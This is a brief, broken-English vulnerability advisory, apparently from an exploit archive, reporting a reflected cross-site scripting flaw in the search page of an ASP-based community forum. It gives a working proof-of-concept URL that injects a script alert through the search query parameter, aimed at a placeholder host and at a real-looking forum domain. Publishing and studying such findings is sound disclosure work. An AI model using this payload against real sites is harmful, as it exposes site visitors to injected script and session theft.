Community forum suffers from a cross site scripting flaw. Exploitation provided.
1757445512d7b26b3c7d49e6539b4b39db1a6df52d0f99323f9c9bb682b2a2c0
there is aproplem in Community forum
community forum make by asp
i found a xss in search
when we typed
http://www.victim.com/forum/search/SearchResults.aspx?q=><script>alert('CSS%20Vulnerable')</script><b%20a=a%20&f=&u=
EXAMPLE
http://forums.asp.net/search/SearchResults.aspx?q=><script>alert('CSS%20Vulnerable')</script><b%20a=a%20&f=&u=
it will make a xss
credit
abducter_minds@yahoo.com
all ARAB { EGYPT }